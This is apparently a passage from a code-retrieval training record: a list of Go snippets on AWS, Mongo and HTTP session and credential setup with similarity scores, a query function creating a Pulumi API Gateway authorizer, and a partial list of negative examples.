aws.String(\"mock-region\"),\n\t\t}))\n\t}\n\n\treturn sess\n}", "func (CcsAwsSession *ccsAwsSession) GetRegion() *string {\n\treturn CcsAwsSession.session.Config.Region\n}", "func (cl *APIClient) GetSession() (string, error) {\n\tsessid := cl.socketConfig.GetSession()\n\tif len(sessid) == 0 {\n\t\treturn \"\", errors.New(\"Could not find an active session\")\n\t}\n\treturn sessid, nil\n}", "func (c *IAM) getAWSConfigurator(ctx context.Context, database types.Database) (*awsClient, error) {\n\tidentity, err := c.getAWSIdentity(ctx, database)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\tpolicyName, err := c.getPolicyName()\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\treturn newAWS(ctx, awsConfig{\n\t\tclients: c.cfg.Clients,\n\t\tpolicyName: policyName,\n\t\tidentity: identity,\n\t\tdatabase: database,\n\t})\n}", "func CreateSession() {\n\n\tconst MT = \"init\"\n\t// Initialize a session that the SDK uses to load\n\t// credentials from the shared credentials file ~/.aws/credentials\n\t// and configuration from the shared configuration file ~/.aws/config.\n\t/*s, err := session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t\tProfile: \"tfm-develop\",\n\t})*/\n\n\ts, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(\"eu-central-1\")},\n\t)\n\n\tif err != nil {\n\t\tlog.Println(\"Couldn't create AWS session\", err)\n\t}\n\tawsSession = s\n\tlog.Println(\"AWS Session successfully created.\")\n\n}", "func CreateSession(connJSON string) (*session.Session, error) {\n\tvar err error\n\tparam := ConnParameter{}\n\tif err = json.Unmarshal([]byte(connJSON), &param); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif param.Region == \"\" {\n\t\treturn nil, fmt.Errorf(\"Invalid s3 profile: region is empty\")\n\t}\n\n\tvar c *credentials.Credentials\n\tswitch param.Type {\n\tcase \"credentialfile\":\n\t\tc, err = credentialWithInherit(&param)\n\tcase \"accesskey\":\n\t\tc, err = credentialWithAccesskey(&param)\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn session.NewSession(&aws.Config{\n\t\tRegion: aws.String(param.Region),\n\t\tCredentials: c,\n\t})\n}", "func Get(c echo.Context) (*sessions.Session, error) {\n\tsess, err := session.Get(sessionStr, c)\n\treturn sess, err\n}", "func (handler *IdentityProviderHandler) GetSession(sessionID string, userAgent string, remoteAddr string) (r *services.Session, err error) {\n\thandler.log.Printf(\"getSession(%v, %v, %v)\", sessionID, userAgent, remoteAddr)\n\n\tsession, err := handler.SessionInteractor.Find(sessionID)\n\tif err != nil {\n\t\te := err.(*errs.Error)\n\t\treturn nil, errorToServiceError(e)\n\t}\n\n\tif !session.Domain.Enabled || !session.User.Enabled {\n\t\te := services.NewUnauthorizedError()\n\t\te.Msg = \"Domain and/or user disabled\"\n\t\treturn nil, e\n\t}\n\n\tif session.UserAgent != userAgent || session.RemoteAddr != remoteAddr {\n\t\te := services.NewNotFoundError()\n\t\te.Msg = \"Session not found\"\n\t\treturn nil, e\n\t}\n\n\tif session.IsExpired() {\n\t\te := services.NewUnauthorizedError()\n\t\te.Msg = \"Session expired\"\n\t\treturn nil, e\n\t}\n\n\terr = handler.SessionInteractor.Retain(*session)\n\tif err != nil {\n\t\te := err.(*errs.Error)\n\t\treturn nil, errorToServiceError(e)\n\t}\n\n\treturn sessionToResponse(session), nil\n}", "func getSession(ctx context.Context, id string) (middleware.Session, error) {\n\tsessionUUID, err := uuid.FromString(id)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsession, err := loader.Loader.GetSession(ctx, sessionUUID)\n\n\treturn Session{Row: session}, err\n}", "func getS3Client(region string) (*s3.S3, error) {\n\tsess, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(region)},\n\t)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn s3.New(sess), nil\n}", "func NewAwsClientFromEnv() (*Client, error) {\n\taccessKey := os.Getenv(\"AWS_ACCESS_KEY_ID\")\n\tif accessKey == \"\" {\n\t\taccessKey = os.Getenv(\"AWS_ACCESS_KEY\")\n\t\tif accessKey == \"\" {\n\t\t\treturn nil, errors.New(\"AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY not found in environment\")\n\t\t}\n\t}\n\n\tsecretKey := os.Getenv(\"AWS_SECRET_ACCESS_KEY\")\n\tif secretKey == \"\" {\n\t\tsecretKey = os.Getenv(\"AWS_SECRET_KEY\")\n\t\tif secretKey == \"\" {\n\t\t\treturn nil, errors.New(\"AWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY not found in environment\")\n\t\t}\n\t}\n\n\tregion := os.Getenv(\"AWS_REGION\")\n\tif region == \"\" {\n\t\treturn nil, errors.New(\"AWS_REGION not found in environment\")\n\t}\n\n\tsessionToken := os.Getenv(\"AWS_SESSION_TOKEN\")\n\tendpoint := \"https://dynamodb.\" + region + \".amazonaws.com/\"\n\treturn NewClient(newAwsExecutorToken(endpoint, region, accessKey, secretKey, sessionToken)), nil\n}", "func (client BastionClient) getSession(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/sessions/{sessionId}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response GetSessionResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func AWSGetToken(accessKeyId, secretAccessKey, region, clusterID string) (string, error) {\n\tcred := credentials.NewStaticCredentials(accessKeyId, secretAccessKey, \"\")\n\n\tsess, err := session.NewSession(&aws.Config{Region: aws.String(region), Credentials: cred})\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tstsClient := sts.New(sess)\n\n\trequest, _ := stsClient.GetCallerIdentityRequest(&sts.GetCallerIdentityInput{})\n\trequest.HTTPRequest.Header.Add(\"x-k8s-aws-id\", clusterID)\n\tpresignedURLString, err := request.Presign(60)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn fmt.Sprintf(`{\"token\": \"k8s-aws-v1.%s\"}`, base64.RawURLEncoding.EncodeToString([]byte(presignedURLString))), nil\n}", "func (g *GaeAccessManager) GetSystemSession(site, firstname, lastname string) (Session, error) {\n\treturn g.GetSystemSessionWithRoles(site, firstname, lastname, \"s1:s2:s3:s4\")\n}", "func (c *client) getSessionId() string {\n\tc.acquireWriter()\n\tdefer c.releaseWriter()\n\treturn c.sessId\n}", "func AWSCfg(ctx context.Context, accessKeyID, secretKey string) aws.Config {\n\topts := []func(*config.LoadOptions) error{\n\t\tconfig.WithRegion(\"us-west-1\"),\n\t}\n\n\t// In local environment we use the default credentials chain that\n\t// will automatically pull creds from saml2aws,\n\tif !Local {\n\t\topts = append(opts, config.WithCredentialsProvider(\n\t\t\tcredentials.NewStaticCredentialsProvider(accessKeyID, secretKey, \"\"),\n\t\t))\n\t}\n\n\tcfg, err := config.LoadDefaultConfig(ctx, opts...)\n\tif err != nil {\n\t\tfmt.Println(\"failed to load aws config:\", err)\n\t\tos.Exit(1)\n\t}\n\n\treturn cfg\n}", "func getS3(r *http.Request) (S3, error) {\n session, err := store.Get(r, \"session-name\")\n if err != nil {\n return S3{}, err\n }\n s3 := S3{\n EndPointString: session.Values[\"Endpoint\"].(string),\n AccessKey: session.Values[\"AccessKey\"].(string),\n SecretKey: session.Values[\"SecretKey\"].(string),\n Namespace: \"\",\n }\n return s3, nil\n}", "func GetSessionToken(awsConfig aws.Config, duration int64, device string, code string) (*Profile, error) {\n\tif len(device) == 0 && len(code) == 0 {\n\t\treturn nil, errors.New(\"device and code are required\")\n\t}\n\n\tservice := sts.New(awsConfig)\n\treq := service.GetSessionTokenRequest(&sts.GetSessionTokenInput{\n\t\tDurationSeconds: aws.Int64(duration),\n\t\tSerialNumber: aws.String(device),\n\t\tTokenCode: aws.String(code),\n\t})\n\n\tresp, err := req.Send(context.Background())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\texpirationDate := time.Now().UTC().Add(time.Duration(duration) * time.Second)\n\n\tif resp == nil || resp.Credentials == nil {\n\t\treturn nil, errors.New(\"unable to read credentials\")\n\t}\n\n\treturn &Profile{\n\t\tAssumedRole: \"False\",\n\t\tAssumedRoleARN: \"\",\n\t\tAWSAccessKeyID: aws.StringValue(resp.Credentials.AccessKeyId),\n\t\tAWSSecretAccessKey: aws.StringValue(resp.Credentials.SecretAccessKey),\n\t\tAWSSessionToken: aws.StringValue(resp.Credentials.SessionToken),\n\t\tAWSSecurityToken: aws.StringValue(resp.Credentials.SessionToken),\n\t\tExpiration: expirationDate.Format(\"2006-01-02 15:04:05\"),\n\t}, nil\n}", "func (c *Config) Client() (*alks.Client, error) {\n\tlog.Println(\"[DEBUG] Validating STS credentials\")\n\n\t// lookup credentials\n\tcreds := getCredentials(c)\n\tcp, cpErr := creds.Get()\n\n\tif cpErr == nil {\n\t\tlog.Printf(\"[DEBUG] Got credentials from provider: %s\\n\", cp.ProviderName)\n\t}\n\n\t// validate we have credentials\n\tif cpErr != nil {\n\t\tif awsErr, ok := cpErr.(awserr.Error); ok && awsErr.Code() == \"NoCredentialProviders\" {\n\t\t\tvar err error\n\t\t\tcreds, err = getCredentialsFromSession(c)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tcp, cpErr = creds.Get()\n\t\t}\n\t}\n\tif cpErr != nil {\n\t\treturn nil, errNoValidCredentialSources\n\t}\n\n\t// create a new session to test credentails\n\tsess, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(\"us-east-1\"),\n\t\tCredentials: creds,\n\t})\n\n\t// validate session\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"Error creating session from STS. (%v)\", err)\n\t}\n\n\tvar stsconn *sts.STS\n\t// we need to assume another role before creating an ALKS client\n\tif c.AssumeRole.RoleARN != \"\" {\n\t\tarCreds := stscreds.NewCredentials(sess, c.AssumeRole.RoleARN, func(p *stscreds.AssumeRoleProvider) {\n\t\t\tif c.AssumeRole.SessionName != \"\" {\n\t\t\t\tp.RoleSessionName = c.AssumeRole.SessionName\n\t\t\t}\n\n\t\t\tif c.AssumeRole.ExternalID != \"\" {\n\t\t\t\tp.ExternalID = &c.AssumeRole.ExternalID\n\t\t\t}\n\n\t\t\tif c.AssumeRole.Policy != \"\" {\n\t\t\t\tp.Policy = &c.AssumeRole.Policy\n\t\t\t}\n\t\t})\n\n\t\tcp, cpErr = arCreds.Get()\n\t\tif cpErr != nil {\n\t\t\treturn nil, fmt.Errorf(\"The role %q cannot be assumed. Please verify the role ARN, role policies and your base AWS credentials\", c.AssumeRole.RoleARN)\n\t\t}\n\n\t\tstsconn = sts.New(sess, &aws.Config{\n\t\t\tRegion: aws.String(\"us-east-1\"),\n\t\t\tCredentials: arCreds,\n\t\t})\n\t} else {\n\t\tstsconn = sts.New(sess)\n\t}\n\n\t// make a basic api call to test creds are valid\n\t_, serr := stsconn.GetCallerIdentity(&sts.GetCallerIdentityInput{})\n\t// check for valid creds\n\tif serr != nil {\n\t\treturn nil, serr\n\t}\n\n\t// got good creds, create alks sts client\n\tclient, err := alks.NewSTSClient(c.URL, cp.AccessKeyID, cp.SecretAccessKey, cp.SessionToken)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// 1. Check if calling for a specific account\n\tif len(c.Account) > 0 && len(c.Role) > 0 {\n\t\t// 2. Generate client specified\n\t\tclient, err = generateNewClient(c, client)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tclient.SetUserAgent(fmt.Sprintf(\"alks-terraform-provider-%s\", getPluginVersion()))\n\n\tlog.Println(\"[INFO] ALKS Client configured\")\n\n\treturn client, nil\n}", "func Get(ctx context.Context) *Session {\n\t// TODO maybe check this\n\treturn ctx.Value(sessionContextKey{}).(*Session)\n}", "func SessionGet(token string) (*Session, bool) {\n\ts, ok := Sessions[token]\n\treturn s, ok\n}", "func getSession() *mgo.Session {\n\t// Connect to our local mongo\n\tmongoURL := strings.Replace(os.Getenv(\"MONGO_PORT\"), \"tcp\", \"mongodb\", 1)\n\tif mongoURL == \"\" {\n\t\tpanic(\"MONGO_PORT env var not set.\")\n\t} else {\n\t\tfmt.Printf(\"MONGO_PORT: %s\", mongoURL)\n\t}\n\ts, err := mgo.Dial(mongoURL)\n\n\t// Check if connection error, is mongo running?\n\tif err != nil {\n\t\tprintln(\"Is mongo running?\")\n\t\tpanic(err)\n\t}\n\n\t// Deliver session\n\treturn s\n}", "func (sm *SessionManager) Get(w http.ResponseWriter, r *http.Request, log httpway.Logger) httpway.Session {\n\tsessionId := \"\"\n\n\tcook, err := r.Cookie(\"_s\")\n\tif err == nil {\n\t\tsessionId = cook.Value\n\t}\n\n\treturn sm.GetById(sessionId, w, r, log)\n}", "func NewEC2Session() (*EC2Client, error) {\n\tsess, err := session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t})\n\tif err != nil {\n\t\tlog.Fatal(sessionError)\n\t\treturn nil, err\n\t}\n\tsvc := ec2.New(sess)\n\treturn &EC2Client{\n\t\tEC2API: svc,\n\t\tworkers: 1, //default workers count\n\t}, nil\n}", "func New(config *Config, sandbox bool, rootURL string, store *storage.Conn) (*Session, error) {\n\tvar endpoint string\n\tif sandbox {\n\t\tendpoint = sandboxURL\n\t} else {\n\t\tendpoint = productionURL\n\t}\n\n\tsess, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(awsRegion),\n\t\tEndpoint: aws.String(endpoint),\n\t})\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"create new aws session\")\n\t}\n\n\tquals, err := loadQuals(sandbox)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"load json quals\")\n\t}\n\n\tsvc := mturk.New(sess)\n\treturn &Session{\n\t\tconfig: config,\n\t\trootURL: rootURL,\n\t\tsandbox: sandbox,\n\t\tMTurk: svc,\n\t\tquals: quals,\n\t\tstore: store,\n\t\tlogger: log.With().Str(\"pkg\", \"mturk\").Logger(),\n\t}, nil\n}", "func createSessionFromSecret(secret *corev1.Secret) *session.Session {\n\n accessKeyId := string(secret.Data[accessKeyIdPropName])\n secretAccessKey := string(secret.Data[secretAccessKeyPropName])\n\n\n log.Infof(\"Creating session from secret %q containing accessKeyId=%s\", *secret.Metadata.Name, accessKeyId)\n\n return createSession(accessKeyId, secretAccessKey, *secret.Metadata.Name + \"-\" +\"orig\")\n\n}", "func GetSession() *mgo.Session {\n\tif session == nil {\n\t\tvar err error\n\t\tsession, err = mgo.DialWithInfo(&mgo.DialInfo{\n\t\t\tAddrs: []string{AppConfig.MongoDBHost},\n\t\t\tUsername: AppConfig.DBUser,\n\t\t\tPassword: AppConfig.DBPwd,\n\t\t\tTimeout: 60 * time.Second,\n\t\t})\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"[GetSession]: %s\\n\", err)\n\t\t}\n\t}\n\treturn session\n}", "func SQSSession(session *baseAWS.Session) func(*SQS) {\n\treturn func(s *SQS) {\n\t\ts.session = session\n\t}\n}", "func getClient() *s3.S3 {\n\tvar client *s3.S3\n\tclient = s3.New(session.New(&aws.Config{\n\t\tRegion: aws.String(\"us-east-1\"),\n\t\tCredentials: credentials.NewSharedCredentials(\"\", credentialsProfile),\n\t}))\n\treturn client\n}", "func GetRegion(configuredRegion string) (string, error) {\n\tif configuredRegion != \"\" {\n\t\treturn configuredRegion, nil\n\t}\n\n\tsess, err := session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t})\n\tif err != nil {\n\t\treturn \"\", errwrap.Wrapf(\"got error when starting session: {{err}}\", err)\n\t}\n\n\tregion := aws.StringValue(sess.Config.Region)\n\tif region != \"\" {\n\t\treturn region, nil\n\t}\n\n\tmetadata := ec2metadata.New(sess, &aws.Config{\n\t\tEndpoint: ec2Endpoint,\n\t\tEC2MetadataDisableTimeoutOverride: aws.Bool(true),\n\t\tHTTPClient: &http.Client{\n\t\t\tTimeout: time.Second,\n\t\t},\n\t})\n\tif !metadata.Available() {\n\t\treturn DefaultRegion, nil\n\t}\n\n\tregion, err = metadata.Region()\n\tif err != nil {\n\t\treturn \"\", errwrap.Wrapf(\"unable to retrieve region from instance metadata: {{err}}\", err)\n\t}\n\n\treturn region, nil\n}", "func getSession() *mgo.Session {\n\tif mgoSession == nil {\n\t\tvar err error\n\t\tmgoSession, err = mgo.Dial(testuri)\n\t\tif err != nil {\n\t\t\tfmt.Println(\"Error connecting to Mongo: \", err)\n\t\t}\n\t}\n\treturn mgoSession.Copy()\n}", "func GetSession(c context.Context, r *http.Request) context.Session {\n\tif val, ok := c.Get(r, context.BaseCtxKey(\"session\")); ok {\n\t\treturn val.(context.Session)\n\t}\n\n\tconf := GetConfig(c)\n\tvar abspath string\n\n\tif filepath.IsAbs(conf.Session.Dir) {\n\t\tabspath = conf.Session.Dir\n\t} else {\n\t\tvar err error\n\t\tabspath, err = filepath.Abs(path.Join(filepath.Dir(os.Args[0]), conf.Session.Dir))\n\n\t\tif err != nil {\n\t\t\tabspath = os.TempDir()\n\t\t}\n\t}\n\n\tsess := context.NewSession([]byte(conf.Session.Secret), []byte(conf.Session.Cipher), abspath)\n\tsess.SetName(util.UUID())\n\treturn sess\n}", "func (sc *Client) getSession(sessionId int) *clientSession {\n\tif sessionId < 0 {\n\t\treturn nil\n\t}\n\tc := make(chan *clientSession)\n\trequest := getSessionInfo{sessionId, c}\n\tselect {\n\tcase sc.getSessionChan <- request:\n\tcase <-sc.quit:\n\t\treturn nil\n\t}\n\tsession := <-c\n\treturn session\n}", "func GetSession(r *http.Request) (*sessions.Session, error) {\n\treturn configurations.Configuration.Session.Store.Get(r, configurations.Configuration.Session.Name)\n}", "func InitAWS() error {\n\tsession, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(config.GetConfig().GetString(\"aws.s3_region\")),\n\t\tCredentials: credentials.NewStaticCredentials(\n\t\t\tconfig.GetConfig().GetString(\"aws.access_key_id\"),\n\t\t\tconfig.GetConfig().GetString(\"aws.secret_access_key\"),\n\t\t\t\"\"),\n\t})\n\n\tif err != nil {\n\t\tlog.Errorf(\"Failed to create aws session, error: %v\", err)\n\t\treturn err\n\t}\n\n\tawsSession = session\n\n\treturn nil\n}", "func GetSessionSecret(ctx context.Context, deviceName, key, baseURL string) (string, error) {\n\tp, err := Init(ctx, &Config{\n\t\tDeviceName: deviceName,\n\t\tKey: key,\n\t\tAPIBaseURL: baseURL,\n\t\tEndpointRoutes: make([]EndpointRoute, 0),\n\t\tWebSocketFeature: \"webhooks\",\n\t})\n\tif err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"prefix\": \"proxy.Proxy.GetSessionSecret\",\n\t\t}).Debug(err)\n\t\treturn \"\", err\n\t}\n\n\tsession, err := p.createSession(ctx)\n\tif err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"prefix\": \"proxy.Proxy.GetSessionSecret\",\n\t\t}).Debug(fmt.Sprintf(\"Error while authenticating with Stripe: %v\", err))\n\t\treturn \"\", err\n\t}\n\n\treturn session.Secret, nil\n}", "func (CcsAwsSession *ccsAwsSession) GetCredentials() (*credentials.Value, error) {\n\tif err := CcsAwsSession.GetAWSSessions(); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create aws session to retrieve credentials: %v\", err)\n\t}\n\n\tcreds, err := CcsAwsSession.session.Config.Credentials.Get()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get aws credentials: %v\", err)\n\t}\n\treturn &creds, nil\n}", "func (o *OktaClient) GetAwsCredentials(i GetAwsCredentialsInput) (GetAwsCredentialsOutput, error) {\n\t// Get the saml assertion first.\n\terr := o.GetSamlAssertion()\n\tif err != nil {\n\t\treturn GetAwsCredentialsOutput{}, err\n\t}\n\tsamlSess := session.Must(session.NewSession())\n\tsvc := sts.New(samlSess)\n\tsamlParams := &sts.AssumeRoleWithSAMLInput{\n\t\tPrincipalArn: aws.String(o.Principle),\n\t\tRoleArn: aws.String(i.RoleArn),\n\t\tSAMLAssertion: aws.String(string(o.SamlData.RawData)),\n\t\tDurationSeconds: aws.Int64(i.Expiration),\n\t}\n\n\tsamlResp, err := svc.AssumeRoleWithSAML(samlParams)\n\tif err != nil {\n\t\treturn GetAwsCredentialsOutput{}, err\n\t}\n\treturn GetAwsCredentialsOutput{\n\t\tAwsAccessKeyId: *samlResp.Credentials.AccessKeyId,\n\t\tAwsSecretAccessKey: *samlResp.Credentials.SecretAccessKey,\n\t\tAwsSessionToken: *samlResp.Credentials.SessionToken,\n\t}, nil\n}", "func CreateNewSession(accessKey, secretKey, region string) *session.Session {\n\tsess := session.Must(session.NewSession(&awsClient.Config{\n\t\tRegion: &region,\n\t\tCredentials: credentials.NewStaticCredentials(accessKey, secretKey, \"\"),\n\t}))\n\n\treturn sess\n\n}", "func CreateNewSession(accessKey, secretKey, sessionToken, region string) *session.Session {\n\tvar credentialsAWS *credentials.Credentials\n\n\t// Use separate call for AWS credentials defined in config.yaml\n\t// Otherwise environment variables will be used\n\tif accessKey != \"\" && secretKey != \"\" {\n\t\tlog.Info(\"Using AccessKey or SecretKey defined in config.yaml\")\n\t\tcredentialsAWS = credentials.NewStaticCredentials(accessKey, secretKey, sessionToken)\n\t}\n\n\tsess := session.Must(session.NewSession(&awsClient.Config{\n\t\tRegion: &region,\n\t\tCredentials: credentialsAWS,\n\t}))\n\n\treturn sess\n\n}", "func SessionsConfig(secret string) gin.HandlerFunc {\n\tcookieStore := cookie.NewStore([]byte(secret))\n\tcookieStore.Options(sessions.Options{\n\t\tPath: \"/\",\n\t\tMaxAge: 10 * 86400,\n\t\tSecure: true,\n\t\tHttpOnly: true,\n\t})\n\treturn sessions.Sessions(\"btube-session\", cookieStore)\n}", "func GetSession(ctx appengine.Context) (session *Session, err error) {\n\treqId := appengine.RequestID(ctx)\n\tsession, ok := authenticatedSessions[reqId]\n\tif ok {\n\t\treturn\n\t}\n\treturn nil, Unauthenticated\n}", "func GetSession(token string) (Session, *errors.Error) {\n\tvar session Session\n\tconnPool, err := GetDBConnectionFunc(sessionStore)\n\tif err != nil {\n\t\treturn session, errors.PackError(err.ErrNo(), \"error while trying to connecting to DB: \", err.Error())\n\t}\n\tsessionData, err := connPool.Read(\"session\", token)\n\tif err != nil {\n\t\treturn session, errors.PackError(err.ErrNo(), \"error while trying to get the session from DB: \", err.Error())\n\t}\n\tif jerr := json.Unmarshal([]byte(sessionData), &session); jerr != nil {\n\t\treturn session, errors.PackError(errors.UndefinedErrorType, \"error while trying to unmarshal session data: \", jerr)\n\t}\n\treturn session, nil\n}", "func getAwsRegion() (region string) {\n\tregion, _ = getAwsRegionE()\n\treturn\n}", "func GetSession(cm *kuberlogicv1.KuberLogicService, client kubernetes.Interface, db string) (session interfaces.Session, err error) {\n\top, err := GetCluster(cm)\n\tif err != nil {\n\t\treturn\n\t}\n\tsession, err = op.GetSession(cm, client, db)\n\treturn\n}", "func (cxt *Context) GetSess() session.SessionStore {\n\tif cxt.sess == nil {\n\t\t// Get the session\n\t\tcxt.sess = Sessions.SessionStart(cxt.ResponseWriter, cxt.Request)\n\t}\n\treturn cxt.sess\n}", "func (s *StorageBase) GetSession(ctx context.Context, sessionId string, ttl time.Duration) (*gmap.StrAnyMap, error) {\n\treturn nil, ErrorDisabled\n}", "func getAwsRegionE() (region string, err error) {\n\n\tif os.Getenv(\"AWS_DEFAULT_REGION\") != \"\" {\n\t\tregion = os.Getenv(\"AWS_DEFAULT_REGION\")\n\t} else {\n\t\t// Grab it from this EC2 instace\n\t\tregion, err = ec2metadata.New(session.New()).Region()\n\t}\n\treturn\n}", "func getSession(r *http.Request) (*sessions.Session, error) {\n\tsession, err := store.Get(r, sessionName)\n\tif err != nil {\n\t\tif session.IsNew {\n\t\t\tglog.V(1).Infof(\"ignoring initial session fetch error since session IsNew: %v\\n\", err)\n\t\t} else {\n\t\t\treturn nil, fmt.Errorf(\"error fetching session: %v\", err)\n\t\t}\n\t}\n\treturn session, nil\n}", "func getConfig() (aws.Config, error) {\n\tif os.Getenv(\"AWS_REGION\") == \"\" {\n\t\treturn aws.Config{}, errors.New(\"AWS_REGION is not set\")\n\t}\n\tcfg, err := config.LoadDefaultConfig(context.TODO())\n\tif err != nil {\n\t\treturn aws.Config{}, err\n\t}\n\treturn cfg, nil\n}" ]
[ "0.7475091", "0.7309152", "0.7308612", "0.7059727", "0.6873469", "0.6860654", "0.676002", "0.671794", "0.6665601", "0.66074514", "0.6492171", "0.6449359", "0.64330184", "0.64273876", "0.62588125", "0.6234018", "0.61775804", "0.61309797", "0.61003613", "0.6086228", "0.6027008", "0.602234", "0.59495467", "0.59081155", "0.58884305", "0.5881455", "0.5874965", "0.5840251", "0.58322316", "0.58193624", "0.5811372", "0.5749134", "0.5734752", "0.5696719", "0.5675704", "0.5666081", "0.5662883", "0.5651032", "0.56080157", "0.5603713", "0.5593577", "0.5590453", "0.55877507", "0.55859023", "0.5583163", "0.5560816", "0.55451316", "0.55447125", "0.55271024", "0.5522337", "0.54817563", "0.5432521", "0.5430325", "0.5418162", "0.54147637", "0.5409408", "0.53969467", "0.53944397", "0.539366", "0.53920615", "0.5391347", "0.5384033", "0.53819114", "0.53667593", "0.53513134", "0.5349691", "0.5340895", "0.5336583", "0.53335756", "0.5331974", "0.53211945", "0.5301227", "0.529989", "0.5286684", "0.5262831", "0.5258551", "0.5255568", "0.5254377", "0.52502006", "0.52434427", "0.52297765", "0.5213364", "0.52096134", "0.5197695", "0.51763904", "0.5175806", "0.5174836", "0.51675826", "0.5162158", "0.5155519", "0.5140409", "0.51394886", "0.5139149", "0.5133211", "0.5132071", "0.5106515", "0.5102742", "0.50977516", "0.5093523", "0.5092609" ]
0.7961176
0
NewAuthorizer registers a new resource with the given unique name, arguments, and options.
func NewAuthorizer(ctx *pulumi.Context, name string, args *AuthorizerArgs, opts ...pulumi.ResourceOpt) (*Authorizer, error) { if args == nil || args.RestApi == nil { return nil, errors.New("missing required argument 'RestApi'") } inputs := make(map[string]interface{}) if args == nil { inputs["authorizerCredentials"] = nil inputs["authorizerResultTtlInSeconds"] = nil inputs["authorizerUri"] = nil inputs["identitySource"] = nil inputs["identityValidationExpression"] = nil inputs["name"] = nil inputs["providerArns"] = nil inputs["restApi"] = nil inputs["type"] = nil } else { inputs["authorizerCredentials"] = args.AuthorizerCredentials inputs["authorizerResultTtlInSeconds"] = args.AuthorizerResultTtlInSeconds inputs["authorizerUri"] = args.AuthorizerUri inputs["identitySource"] = args.IdentitySource inputs["identityValidationExpression"] = args.IdentityValidationExpression inputs["name"] = args.Name inputs["providerArns"] = args.ProviderArns inputs["restApi"] = args.RestApi inputs["type"] = args.Type } s, err := ctx.RegisterResource("aws:apigateway/authorizer:Authorizer", name, true, inputs, opts...) if err != nil { return nil, err } return &Authorizer{s: s}, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (c *APIGateway) CreateAuthorizerRequest(input *CreateAuthorizerInput) (req *request.Request, output *Authorizer) {\n\top := &request.Operation{\n\t\tName: opCreateAuthorizer,\n\t\tHTTPMethod: \"POST\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers\",\n\t}\n\n\tif input == nil {\n\t\tinput = &CreateAuthorizerInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &Authorizer{}\n\treq.Data = output\n\treturn\n}", "func New() *Authorizer {\n\treturn &Authorizer{\n\t\troles: map[string]Role{},\n\t\trolebindings: map[string]RoleBinding{},\n\t}\n}", "func (a *AuthorizationsService) Create(params interface{}) (auth *Authorization, result *Result) {\n\tresult = a.client.post(a.URL, params, &auth)\n\treturn\n}", "func createAuthorization(roleRef, userRef string) string {\n\treturn fmt.Sprintf(`{\n \"type\": \"Authorization\",\n \"user\": \"%s\",\n \"role\": \"%s\",\n \"target\": \"%s\"\n}`, userRef, roleRef, userRef)\n}", "func NewAuthorizerFromCLI() (autorest.Authorizer, error) {\n\tsettings, err := GetSettingsFromEnvironment()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif settings.Values[Resource] == \"\" {\n\t\tsettings.Values[Resource] = settings.Environment.ResourceManagerEndpoint\n\t}\n\n\treturn NewAuthorizerFromCLIWithResource(settings.Values[Resource])\n}", "func (c *myClient) createAuthorization(roleRef, userRef string, wait bool) (results map[string]interface{}, err error) {\n\tnamespace := \"authorization\"\n\n\turl := fmt.Sprintf(\"%s\", namespace)\n\tpostBody := createAuthorization(roleRef, userRef)\n\taction, _, err := c.httpPost(url, postBody)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif wait {\n\t\tc.jobWaiter(action)\n\t}\n\treturn action, err\n}", "func (h Handlers[R, T]) CreateResource(r *http.Request) (corev3.Resource, error) {\n\tvar payload R\n\tif err := json.NewDecoder(r.Body).Decode(&payload); err != nil {\n\t\treturn nil, actions.NewError(actions.InvalidArgument, err)\n\t}\n\n\tmeta := payload.GetMetadata()\n\tif meta == nil {\n\t\treturn nil, actions.NewError(actions.InvalidArgument, errors.New(\"nil metadata\"))\n\t}\n\tif err := checkMeta(*meta, mux.Vars(r), \"id\"); err != nil {\n\t\treturn nil, actions.NewError(actions.InvalidArgument, err)\n\t}\n\n\tif claims := jwt.GetClaimsFromContext(r.Context()); claims != nil {\n\t\tmeta.CreatedBy = 